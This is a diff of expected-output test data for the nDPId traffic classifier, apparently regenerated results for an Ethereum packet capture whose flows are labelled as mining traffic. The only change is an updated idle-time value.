-00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508364523,"flow_last_seen":1578508365656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.GoogleCloud","breed":"Acceptable","category":"Cloud"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1578508365271,"flow_last_seen":1578508365838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":1762,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1578508365279,"flow_last_seen":1578508366038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1578508364714,"flow_last_seen":1578508364919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1578508365300,"flow_last_seen":1578508366073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":1177,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365154,"flow_last_seen":1578508365257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1578508364523,"flow_last_seen":1578508364687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":1846,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508365194,"flow_last_seen":1578508366069,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508364937,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":470,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508364523,"flow_last_seen":1578508365656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1578508365271,"flow_last_seen":1578508365838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":1762,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1578508365279,"flow_last_seen":1578508366038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1578508364714,"flow_last_seen":1578508364919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1578508365300,"flow_last_seen":1578508366073,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":1177,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365154,"flow_last_seen":1578508365257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364654,"flow_last_seen":1578508364729,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1578508365079,"flow_last_seen":1578508365297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":1734,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508365169,"flow_last_seen":1578508365272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1578508365079,"flow_last_seen":1578508365297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":1734,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508365169,"flow_last_seen":1578508365272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365461,"flow_last_seen":1578508365899,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1578508364523,"flow_last_seen":1578508365354,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1578508364522,"flow_last_seen":1578508364841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365331,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1578508364523,"flow_last_seen":1578508365354,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1578508364522,"flow_last_seen":1578508364841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364519,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508365097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508365097,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 